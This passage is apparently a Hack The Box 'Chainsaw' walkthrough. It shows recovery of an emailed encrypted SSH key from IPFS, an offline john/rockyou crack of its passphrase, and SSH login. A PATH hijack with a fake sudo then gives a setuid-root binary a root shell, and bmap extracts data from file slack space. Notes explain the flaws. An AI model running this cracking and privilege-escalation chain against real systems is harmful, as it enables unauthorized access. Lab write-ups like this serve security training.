# NOTE(review): username is not validated before it becomes a path, so a
# value containing path separators would write outside the intended directory.
filename = “{}.key”.format(username)

with open(filename, ‘w’) as file:
# NOTE(review): open() has already created the file with default
# (umask-derived) permissions by the time chmod runs; creating it with
# os.open() and mode 0600 would close that window.
chmod(filename, 0600)
file.write(priv)
# Redundant: the with-block closes the file on exit.
file.close()

# No chmod is applied to the .pub file; it keeps the default permissions.
with open(“{}.pub”.format(filename), ‘w’) as file:
file.write(pub)
file.close()

# TODO: Distribute keys via ProtonMail

# Script entry point: repeatedly prompt for a user name and a passphrase and
# generate a key pair for each. The loop has no exit condition, so it runs
# until the process is interrupted. raw_input() is the Python 2 builtin.
if __name__ == “__main__”:
while True:
username = raw_input(“User: “)
# getpass() is used to read the passphrase.
password = getpass.getpass()
generate(username,password)

administrator@chainsaw:/home/administrator/maintain$ cd ..
cd ..
administrator@chainsaw:/home/administrator$ ls -lrt
ls -lrt
total 8
drwxr-x— 3 administrator administrator 4096 Dec 13 2018 maintain
-rw-r—– 1 administrator administrator 220 Dec 20 2018 chainsaw-emp.csv
administrator@chainsaw:/home/administrator$ ls -la
ls -la
total 112
drwxr-x— 10 administrator administrator 4096 Nov 24 06:20 .
drwxr-xr-x 4 root root 4096 Dec 12 2018 ..
lrwxrwxrwx 1 administrator administrator 9 Dec 12 2018 .bash_history -> /dev/null
-rw-r—– 1 administrator administrator 220 Dec 12 2018 .bash_logout
-rw-r—– 1 administrator administrator 3771 Dec 12 2018 .bashrc
drwx—— 2 administrator administrator 4096 Nov 24 06:20 .cache
-rw-r—– 1 administrator administrator 220 Dec 20 2018 chainsaw-emp.csv
drwx—— 3 administrator administrator 4096 Nov 24 06:20 .gnupg
drwxrwxr-x 5 administrator administrator 4096 Nov 24 06:26 .ipfs
drwxr-x— 3 administrator administrator 4096 Dec 12 2018 .local
drwxr-x— 3 administrator administrator 4096 Dec 13 2018 maintain
drwxr-x— 2 administrator administrator 4096 Dec 12 2018 .ngrok2
-rw-r—– 1 administrator administrator 807 Dec 12 2018 .profile
drwxr-x— 2 administrator administrator 4096 Nov 24 06:19 .ssh
drwxr-x— 2 administrator administrator 4096 Dec 12 2018 .swt
-rw-r—– 1 administrator administrator 1739 Dec 12 2018 .tmux.conf
-rw-r—– 1 administrator administrator 45152 Dec 12 2018 .zcompdump
lrwxrwxrwx 1 administrator administrator 9 Dec 12 2018 .zsh_history -> /dev/null
-rw-r—– 1 administrator administrator 1295 Dec 12 2018 .zshrc

administrator@chainsaw:/home/administrator$ cd .ipfs
cd .ipfs
administrator@chainsaw:/home/administrator/.ipfs$ ls -la
ls -la
total 36
drwxrwxr-x 5 administrator administrator 4096 Nov 24 06:26 .
drwxr-x— 10 administrator administrator 4096 Nov 24 06:20 ..
drwxr-xr-x 41 administrator administrator 4096 Nov 24 06:26 blocks
-rw-rw—- 1 administrator administrator 5273 Dec 13 2018 config
drwxr-xr-x 2 administrator administrator 4096 Nov 24 06:26 datastore
-rw——- 1 administrator administrator 190 Dec 13 2018 datastore_spec
drwx—— 2 administrator administrator 4096 Dec 13 2018 keystore
-rw-r–r– 1 administrator administrator 2 Dec 13 2018 version

administrator@chainsaw:/home/administrator/.ipfs$ grep -Hinra bobby *
grep -Hinra bobby *
bobby.key.pub�6BBWXJ4N54A5BUNC7WYVUQNXLEQN67SNFTAPGUMYTYB2UAC4SGI.data:4:I�
blocks/JL/CIQKWHQP7PFXWUXO6CSIFQMFWW4CTR23WJEFINRLPRC6UAP2ZM5EJLY.data:4:�_���f�ԙ���|���>��7b9bobbyaxelrod600-protonmail-2018-12-13-T20_28_54+01_00.eml�$b
blocks/OY/CIQG3CRQFZCTNW7GKEFLYX5KSQD4SZUO2SMZHX6ZPT57JIR6WSNTOYQ.data:9:To: bobbyaxelrod600@protonmail.ch <bobbyaxelrod600@protonmail.ch>
blocks/OY/CIQG3CRQFZCTNW7GKEFLYX5KSQD4SZUO2SMZHX6ZPT57JIR6WSNTOYQ.data:10:X-Attached: bobby.key.enc
blocks/OY/CIQG3CRQFZCTNW7GKEFLYX5KSQD4SZUO2SMZHX6ZPT57JIR6WSNTOYQ.data:13:X-Original-To: bobbyaxelrod600@protonmail.ch
blocks/OY/CIQG3CRQFZCTNW7GKEFLYX5KSQD4SZUO2SMZHX6ZPT57JIR6WSNTOYQ.data:15:Delivered-To: bobbyaxelrod600@protonmail.ch
blocks/OY/CIQG3CRQFZCTNW7GKEFLYX5KSQD4SZUO2SMZHX6ZPT57JIR6WSNTOYQ.data:37:Content-Type: application/octet-stream; filename=”bobby.key.enc”; name=”bobby.key.enc”
blocks/OY/CIQG3CRQFZCTNW7GKEFLYX5KSQD4SZUO2SMZHX6ZPT57JIR6WSNTOYQ.data:39:Content-Disposition: attachment; filename=”bobby.key.enc”; name=”bobby.key.enc”
blocks/SP/CIQJWFQFWYW5QEXAELBZ5WBEDCJBZ2RSPCHVGDOXQ6FM67VBWKVTSPI.data:5:bobby@chainsaw,Yes,Java Developer</bobbyaxelrod600@protonmail.ch>

administrator@chainsaw:/home/administrator$ ipfs refs local
ipfs refs local
QmYCvbfNbCwFR45HiNP45rwJgvatpiW38D961L5qAhUM5Y
QmPctBY8tq2TpPufHuQUbe2sCxoy2wD5YRB6kdce35ZwAx
QmbwWcNc7TZBUDFzwW7eUTAyLE2hhwhHiTXqempi1CgUwB
QmdL9t1YP99v4a2wyXFYAQJtbD9zKnPrugFLQWXBXb82sn
QmSKboVigcD3AY4kLsob117KJcMHvMUu6vNFqk1PQzYUpp
QmUHHbX4N8tUNyXFK9jNfgpFFddGgpn72CF1JyNnZNeVVn
QmegE6RZe59xf1TyDdhhcNnMrsevsfuJHUynLuRc4yf6V1
QmWSLAHhiNVRMFMv4bnE7fqq9E74RtXTRm9E1QVo37GV9t
QmPjsarLFBcY8seiv3rpUZ2aTyauPF3Xu3kQm56iD6mdcq
QmZrd1ik8Z2F5iSZPDA2cZSmaZkHFEE4jZ3MiQTDKHAiri
QmdfTbBqBPQ7VNxZEYEj14VmRuZBkqFbiwReogJgS1zR1n
QmfRZWFfaugHeY5gcgNDrnRkxhPT3epmHodryPYK3it6kk
QmZTR5bcpQD7cFgTorqxZDYaew1Wqgfbd2ud9QqGPAkK2V
QmejvEPop4D7YUadeGqYWmZxHhLc4JBUCzJJHWMzdcMe2y
QmbkQxbErC7KSWzSQw2FC13LUm9Rbo2XjeFQZbcmdarpuz
QmPpsT37SpTbZkAeMz7LXiJ8nQseBNziGBzpW1YtM67qx6
QmXWS8VFBxJPsxhF8KEqN1VpZf52DPhLswcXpxEDzF5DWC
QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF
QmZxzK6gXioAUH9a68ojwkos8EaeANnicBJNA3TND4Sizp
Qmb7oGTxge7amSArtJsGUAqswY8y1G7m5QNjV57Nj5sEHU
QmS4ustL54uo8FzR9455qaxZwuMiUhyvMcX9Ba8nUH4uVv
QmXymZCHdTHz5BA5ugv9MQTBtQAb6Vit4iFeEnuRj6Udrh
QmUNLLsPACCz1vLxQVkXqqLX5R1X345qqfHbsf67hvA3Nn
Qma6kDKzUzFioo62v4LZaNsrwmCojF9AqwLaQJubRFnsAa
QmXwXzVYKgYZEXU1dgCKeejT87Knw9nydGcuUZrjwNb2Me
QmXgqKTbzdh83pQtKFb19SpMCpDDcKR2ujqk3pKph9aCNF
QmYn3NxLLYA6xU2XL1QJfCZec4B7MpFNxVVtDvqbiZCFG8
QmWMuEvh2tGJ1DiNPPoN6rXme2jMYUixjxsC6QUji8mop8
QmY5heUM5qgRubMDD1og9fhCPA6QdkMp3QCwd4s7gJsyE7
QmQ5vhrL7uv6tuoN9KeVBwd4PwfQkXdVVmDLUZuTNxqgvm
QmZMUdskS6vK8ycBiAffrYAE4wUDuWX9eK7kNgQqPCGbwF
QmPC3ZbrMeZ8BpstpNseNV4fCRL4QDzUKrSv8EHkarbn7r
QmPhk6cJkRcFfZCdYam4c9MKYjFG9V29LswUnbrFNhtk2S
QmSyJKw6U6NaXupYqMLbEbpCdsaYR5qiNGRHjLKcmZV17r
QmZZRTyhDpL5Jgift1cHbAhexeE1m2Hw8x8g7rTcPahDvo
QmUH2FceqvTSAvn6oqm8M49TNDqowktkEx4LgpBx746HRS
QmcMCDdN1qDaa2vaN654nA4Jzr6Zv9yGSBjKPk26iFJJ4M
QmPZ9gcCEpqKTo6aq61g2nXGUhM4iCL3ewB6LDXZCtioEB
Qmc7rLAhEh17UpguAsEyS4yfmAbeqSeSEz4mZZRNcW52vV

administrator@chainsaw:/home/administrator$ ipfs ls QmZrd1ik8Z2F5iSZPDA2cZSmaZkHFEE4jZ3MiQTDKHAiri
/dev/null
-rw-r----- 1 administrator administrator 220 Dec 12 2018 .bash_logout
-rw-r----- 1 administrator administrator 3771 Dec 12 2018 .bashrc
drwx------ 2 administrator administrator 4096 Nov 24 06:20 .cache
-rw-r----- 1 administrator administrator 220 Dec 20 2018 chainsaw-emp.csv
drwx------ 3 administrator administrator 4096 Nov 24 06:20 .gnupg
drwxrwxr-x 5 administrator administrator 4096 Nov 24 12:10 .ipfs
drwxr-x--- 3 administrator administrator 4096 Dec 12 2018 .local
drwxr-x--- 3 administrator administrator 4096 Dec 13 2018 maintain
drwxr-x--- 2 administrator administrator 4096 Dec 12 2018 .ngrok2
-rw-r----- 1 administrator administrator 807 Dec 12 2018 .profile
-rw-r--r-- 1 administrator administrator 4629 Nov 24 12:10 QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF
drwxr-x--- 2 administrator administrator 4096 Nov 24 06:19 .ssh
drwxr-x--- 2 administrator administrator 4096 Dec 12 2018 .swt
-rw-r----- 1 administrator administrator 1739 Dec 12 2018 .tmux.conf
-rw-r----- 1 administrator administrator 45152 Dec 12 2018 .zcompdump
lrwxrwxrwx 1 administrator administrator 9 Dec 12 2018 .zsh_history -> /dev/null
-rw-r----- 1 administrator administrator 1295 Dec 12 2018 .zshrc

administrator@chainsaw:/home/administrator$ cat QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF
< cat QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF
X-Pm-Origin: internal
X-Pm-Content-Encryption: end-to-end
Subject: Ubuntu Server Private RSA Key
From: IT Department <chainsaw_admin@protonmail.ch>
Date: Thu, 13 Dec 2018 19:28:54 +0000
Mime-Version: 1.0
Content-Type: multipart/mixed;boundary=———————d296272d7cb599bff2a1ddf6d6374d93
To: bobbyaxelrod600@protonmail.ch <bobbyaxelrod600@protonmail.ch>
X-Attached: bobby.key.enc
Message-Id: <zctvlwvo5mwy8nabt3clkmxvckb-cx7ocfxuyfhsu2af1nh4krcpggz7h-porsytjrt3sa9ju8wnuwaranbe0cy0nik2wmuwovonmrhhpou=@protonmail.ch>
Received: from mail.protonmail.ch by mail.protonmail.ch; Thu, 13 Dec 2018 14:28:58 -0500
X-Original-To: bobbyaxelrod600@protonmail.ch
Return-Path: <chainsaw_admin@protonmail.ch>
Delivered-To: bobbyaxelrod600@protonmail.ch

———————–d296272d7cb599bff2a1ddf6d6374d93
Content-Type: multipart/related;boundary=———————ffced83f318ffbd54e80374f045d2451

———————–ffced83f318ffbd54e80374f045d2451
Content-Type: text/html;charset=utf-8
Content-Transfer-Encoding: base64
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———————–ffced83f318ffbd54e80374f045d2451–
———————–d296272d7cb599bff2a1ddf6d6374d93
Content-Type: application/octet-stream; filename=”bobby.key.enc”; name=”bobby.key.enc”
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=”bobby.key.enc”; name=”bobby.key.enc”
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———————–d296272d7cb599bff2a1ddf6d6374d93–

root@kali:~/Desktop/HTB/boxes/chainsaw# nano bobby.key.enc.b64
root@kali:~/Desktop/HTB/boxes/chainsaw# base64 -d bobby.key.enc.b64 > bobby.key.enc

root@kali:~/Desktop/HTB/boxes/chainsaw# cat bobby.key.enc
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,53D881F299BA8503
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—–END RSA PRIVATE KEY—–

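# Note: the DEK-Info header (DES-EDE3-CBC) marks the legacy PEM key encryption, which john reports below as MD5/3DES. It has no real work factor, so passphrase guesses are cheap to test offline. The mitigation is to store keys in the OpenSSH format with its bcrypt KDF and to use a passphrase that is not in common wordlists.
root@kali:~/Downloads# /usr/share/john/ssh2john.py bobby.key.enc > bobby.key.enc.hash
root@kali:~/Downloads# john --wordlist=/usr/share/wordlists/rockyou.txt ./bobby.key.enc.hash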
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press ‘q’ or Ctrl-C to abort, almost any other key for status
jackychain (bobby.key.enc)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:05 DONE (2019-11-24 12:26) 0.1908g/s 2736Kp/s 2736Kc/s 2736KC/sa6_123..*7¡Vamos!
Session completed

root@kali:~/Downloads# chmod 600 bobby.key.enc
root@kali:~/Downloads# ssh -i bobby.key.enc bobby@10.10.10.142
Enter passphrase for key ‘bobby.key.enc’: jackychain

bobby@chainsaw:~$

bobby@chainsaw:~$ cat user.txt
af8d9df991cc59bXXXXXXXXXXXXXXXXXX

bobby@chainsaw:~$ cd projects

bobby@chainsaw:~/projects$ ls -lrt
total 4
drwxrwxr-x 2 bobby bobby 4096 Nov 24 06:45 ChainsawClub

bobby@chainsaw:~/projects$ cd ChainsawClub

bobby@chainsaw:~/projects/ChainsawClub$

bobby@chainsaw:~/projects/ChainsawClub$ cd /etc/supervisor/conf.d
bobby@chainsaw:/etc/supervisor/conf.d$ ls -lrt
total 8
-rw-r--r-- 1 root root 130 Dec 12 2018 weaponizedping.conf
-rw-r--r-- 1 root root 117 Dec 20 2018 chainsawclub.conf
bobby@chainsaw:/etc/supervisor/conf.d$ cat chainsawclub.conf
[program:ChainsawClub]
command=node /usr/local/bin/ganache-cli -h 127.0.0.1 -p 63991
autostart=true
autorestart=true

bobby@chainsaw:/$ pwd
/
bobby@chainsaw:/$ cd ~/projects
bobby@chainsaw:~/projects$ ls -lrt
total 4
drwxrwxr-x 2 bobby bobby 4096 Nov 24 06:45 ChainsawClub
bobby@chainsaw:~/projects$ cd ChainsawClub
bobby@chainsaw:~/projects/ChainsawClub$ ls -lrt
total 156
-rwsr-xr-x 1 root root 16544 Jan 12 2019 ChainsawClub
-rw-r--r-- 1 root root 1164 Jan 23 2019 ChainsawClub.sol
-rw-r--r-- 1 root root 126388 Jan 23 2019 ChainsawClub.json
-rwxrwxr-x 1 bobby bobby 18 Nov 24 06:44 sudo
-rw-r--r-- 1 root root 44 Nov 24 06:45 address.txt

bobby@chainsaw:~/projects/ChainsawClub$ cat ChainsawClub.sol
pragma solidity ^0.4.22;

contract ChainsawClub {

string username = 'nobody';
string password = '7b455ca1ffcb9f3828cfdde4a396139e';
bool approve = false;
uint totalSupply = 1000;
uint userBalance = 0;

function getUsername() public view returns (string) {
return username;
}
function setUsername(string _value) public {
username = _value;
}
function getPassword() public view returns (string) {
return password;
}
function setPassword(string _value) public {
password = _value;
}
function getApprove() public view returns (bool) {
return approve;
}
function setApprove(bool _value) public {
approve = _value;
}
function getSupply() public view returns (uint) {
return totalSupply;
}
function getBalance() public view returns (uint) {
return userBalance;
}
function transfer(uint _value) public {
if (_value > 0 && _value <= totalSupply) {
totalSupply -= _value;
userBalance += _value;
}
}
function reset() public {
username = '';
password = '';
userBalance = 0;
totalSupply = 1000;
approve = false;
}
}

bobby@chainsaw:~/projects/ChainsawClub$ file ChainsawClub
ChainsawClub: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=08b87cf44d6a671b91bc55f6e1f53c7ee083a417, not stripped

bobby@chainsaw:~/projects/ChainsawClub$ ./ChainsawClub
_ _ | | (_) ___| |__ __ _ _ _ __ ___ __ ___ __ / __| '_ \ / _` | | '_ \/ __|/ _` \ \ /\ / / | (__| | | | (_| | | | | \__ \ (_| |\ V V / \___|_| |_|\__,_|_|_| |_|___/\__,_| \_/\_/ club
- Total supply: 1000
- 1 CHC = 51.08 EUR
- Market cap: 51080 (€)
[*] Please sign up first and then log in!
[*] Entry based on merit.
Username:
Password:
[*] Wrong credentials!
^C

bobby@chainsaw:~/projects/ChainsawClub$ netstat -ntlp
(Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:9810 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:63991 0.0.0.0:* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -

root@kali:~/Downloads# ssh -L 63991:127.0.0.1:63991 -i bobby.key.enc bobby@10.10.10.142
Enter passphrase for key 'bobby.key.enc': jackychain
bobby@chainsaw:~$

bobby@chainsaw:~/projects/ChainsawClub$ ltrace ./ChainsawClub
setuid(0) = -1
system("sudo -i -u root /root/ChainsawCl"...[sudo] password for bobby:

# Note: the ltrace output shows the setuid-root binary passing the bare command name "sudo" to system(), so the shell resolves it through the PATH inherited from the calling user. That is the root cause of the escalation below. A setuid program should call helpers by absolute path with a sanitised environment, or avoid system() altogether.
bobby@chainsaw:~/projects/ChainsawClub$ export PATH=/tmp:$PATH
bobby@chainsaw:~/projects/ChainsawClub$ echo -e '#!/bin/bash\n\n/bin/bash' > /tmp/sudo
bobby@chainsaw:~/projects/ChainsawClub$ chmod +x /tmp/sudo
bobby@chainsaw:~/projects/ChainsawClub$ ./ChainsawClub
root@chainsaw:~/projects/ChainsawClub# id
uid=0(root) gid=1000(bobby) groups=1000(bobby),30(dip)
root@chainsaw:~/projects/ChainsawClub# cd /root
root@chainsaw:/root# cat root.txt
Mine deeper to get rewarded with root coin (RTC)…

root@chainsaw:/root# cd /home
root@chainsaw:/home# ls -lrt
total 8
drwxr-x--- 9 bobby bobby 4096 Jan 23 2019 bobby
drwxr-x--- 10 administrator administrator 4096 Nov 30 20:50 administrator
root@chainsaw:/home# cd bobby
root@chainsaw:~# ls -lrt
total 12
drwxrwxr-x 2 bobby bobby 4096 Dec 12 2018 resources
drwxrwxr-x 3 bobby bobby 4096 Dec 20 2018 projects
-r--r----- 1 bobby bobby 33 Jan 23 2019 user.txt
root@chainsaw:~# cd projects
root@chainsaw:~/projects# ls -lrt
total 4
drwxrwxr-x 2 bobby bobby 4096 Nov 30 21:42 ChainsawClub
root@chainsaw:~/projects# cd ChainsawClub/
root@chainsaw:~/projects/ChainsawClub# ls /sbin/ | head -1
acpi_available
root@chainsaw:~/projects/ChainsawClub#

root@chainsaw:~/projects/ChainsawClub# dpkg --search acpi_available
powermgmt-base: /sbin/acpi_available
powermgmt-base: /usr/share/man/man1/acpi_available.1.gz

root@chainsaw:~/projects/ChainsawClub# dpkg --search ChainsawClub
dpkg-query: no path found matching pattern *ChainsawClub*

root@chainsaw:~/projects/ChainsawClub# for file in $(ls /sbin/*); do dpkg --search $file 1>/dev/null; done
dpkg-query: no path found matching pattern /sbin/bmap
# Note: /sbin/bmap is the only file in /sbin that no installed package owns, which suggests it was placed there by hand. bmap reads and writes file slack space, which is why root.txt is checked for slack next.

root@chainsaw:~/projects/ChainsawClub# cd /root
root@chainsaw:/root# touch /tmp/0xdf
root@chainsaw:/root# bmap --mode checkslack /tmp/0xdf
/tmp/0xdf does not have slack
root@chainsaw:/root# bmap --mode checkslack root.txt
root.txt has slack
root@chainsaw:/root# bmap --mode slack root.txt
getting from block 2655304
file size was: 52
slack size: 4044
block size: 4096
68c874b7deca1b9ddXXXXXXXXXXXXXXXXXXXXXXXX

@SAKSHAM DIXIT
